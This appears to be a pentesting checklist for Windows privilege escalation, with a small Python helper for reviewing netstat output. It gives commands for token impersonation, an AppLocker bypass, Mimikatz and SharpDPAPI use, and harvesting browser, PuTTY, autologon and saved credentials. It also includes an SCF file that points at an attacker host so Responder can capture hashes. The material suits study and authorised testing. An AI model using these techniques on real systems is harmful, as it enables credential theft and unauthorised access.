📋 Windows Privesc Checklist
Check for hidden files in PowerShell with ls -fo
Refer https://github.com/maksyche/pentest-everything/tree/master/enum_and_exploit/windows
Privileges, groups, etc.
Check group membership with
whoami /groups
If in the Print Operators group --> SeLoadDriverPrivilege
DnsAdmins group
Hyper-V Administrators group
Server Operators group
If in the Event Log Readers group, use
wevtutil qe Security /rd:true /f:text /r:share01 /u:julie.clay /p:Welcome1 | findstr "/user"
to view the logs (can also be used without credentials). Can also use:
Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'} | Select-Object @{name='CommandLine';expression={ $_.Properties[8].Value }}
To check for GPOs, use PowerView.
Check for tokens with Incognito.
To list:
.\incognito.exe list_tokens -u
To impersonate:
.\incognito.exe execute -c "domain\user" C:\Windows\system32\cmd.exe
To check environment variables:
set
Check the PATH entries used to locate executables.
View named pipes:
pipelist.exe /accepteula
Or in PowerShell:
gci \\.\pipe\
To check the DACLs of all named pipes:
.\accesschk.exe /accepteula \pipe\
To check a particular pipe:
accesschk.exe /accepteula \\.\Pipe\lsass -v
If in the AD Recycle Bin group, try:
Get-ADObject -SearchBase "CN=Deleted Objects,DC=Cascade,DC=Local" -Filter {ObjectClass -eq "user"} -IncludeDeletedObjects -Properties *
If AppLocker is present, place executables in
C:\Windows\System32\spool\drivers\color
Use Mimikatz once Administrator access is gained. Multiple techniques are outlined on the Mimikatz page.
SharpDPAPI
.\SharpDPAPI.exe machinecredentials

Common Vulnerabilities
Social Engineering
Make an SCF or LNK file, put it in frequently accessed shares and start Responder :)
SCF file:
```ini
[Shell]
Command=2
IconFile=\\10.10.14.3\share\legit.ico
[Taskbar]
Command=ToggleDesktop
```
Programs & Services
To check running services:
tasklist /svc
Check for weak permissions
Check for vulnerable services
Check for DLL injection
AppLocker info:
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
If Citrix is in use, try a Citrix breakout.
To get installed applications (remove "| select displayname" to display all properties). 32-bit:
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
64-bit:
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
Also check the Program Files directory and Downloads.
To get running processes:
Get-Process
Network
For the ARP cache:
arp -a
Network config:
ipconfig /all
Routing table:
route print
For active ports that are listening:
netstat -ano
Look for loopback addresses (127.0.0.1 and ::1) that are not listening on the IP address (10.129.43.8) or broadcast (0.0.0.0, ::/0). The reason is that network sockets on localhost are often insecure because of the assumption that "they aren't accessible to the network."
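A triage of the netstat -ano output described above, as an added example that is not part of the original checklist: it parses a constructed netstat sample and lists the LISTENING TCP sockets bound only to loopback (ignoring ports that are also bound on a wildcard or interface address, since those are network-exposed anyway), so each one can be reviewed for what it trusts from localhost. The addresses and PIDs in the sample are made up.

```python
import ipaddress

# Constructed sample of `netstat -ano` output; addresses and PIDs are made up.
SAMPLE_NETSTAT = """
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    10.129.43.8:3389       0.0.0.0:0              LISTENING       1204
  TCP    127.0.0.1:8080         0.0.0.0:0              LISTENING       4488
  TCP    127.0.0.1:49152        127.0.0.1:49153        ESTABLISHED     4488
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    127.0.0.1:445          0.0.0.0:0              LISTENING       4
  TCP    [::1]:5000             [::]:0                 LISTENING       7320
  UDP    0.0.0.0:5353           *:*                                    2276
"""

def split_endpoint(endpoint):
    """Split 'host:port' or '[v6host]:port' into (host, port)."""
    host, _, port = endpoint.rpartition(":")
    return host.strip("[]"), int(port)

def parse_netstat(text):
    """Parse TCP rows (Proto, Local, Foreign, State, PID); UDP rows have no State and are skipped."""
    rows = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 5 or fields[0] != "TCP":
            continue
        proto, local, _foreign, state, pid = fields
        host, port = split_endpoint(local)
        rows.append({"proto": proto, "host": host, "port": port,
                     "state": state, "pid": int(pid)})
    return rows

def bind_scope(host):
    """'all' for wildcard binds, 'loopback' for 127.0.0.0/8 and ::1, else 'interface'."""
    if host in ("0.0.0.0", "::"):
        return "all"
    return "loopback" if ipaddress.ip_address(host).is_loopback else "interface"

def loopback_only_listeners(rows):
    """Map (proto, port) -> PIDs for LISTENING sockets that only localhost can reach.
    A port also bound on a wildcard/interface address is already network-exposed and skipped."""
    listening = [r for r in rows if r["state"] == "LISTENING"]
    exposed = {(r["proto"], r["port"]) for r in listening if bind_scope(r["host"]) != "loopback"}
    found = {}
    for r in listening:
        key = (r["proto"], r["port"])
        if bind_scope(r["host"]) == "loopback" and key not in exposed:
            found.setdefault(key, set()).add(r["pid"])
    return found
```

On a live host, feed it the real output of netstat -ano and map the returned PIDs to processes with tasklist /svc.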
Files & Creds (PuTTY, Autologon, etc.)
PowerShell
To check whether Script Block Logging or PowerShell Transcription is turned on, and to review command history:
Get-History
Clear-History does not delete the PSReadLine history file; its path is given by:
(Get-PSReadlineOption).HistorySavePath
Go to that path and check it too.
To display it directly:
type C:\Users\dave\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
type C:\Users\Public\Transcripts\transcript01.txt
Check for stored credentials:
cmdkey /list
If stored credentials are present, commands can be run as other users:
PS C:\htb> runas /savecred /user:inlanefreight\bob "COMMAND HERE"
Browser Credentials:
.\SharpChrome.exe logins /unprotect
Use LaZagne to collect various credentials.
To look for saved PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP credentials:
Import-Module .\SessionGopher.ps1
Invoke-SessionGopher -Target WINLPE-SRV01
# Locally:
Invoke-SessionGopher -Thorough
Clear-text passwords in the registry. Autologon:
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
PuTTY: for sessions:
reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions
For the keys and values of a session:
reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\kali%20ssh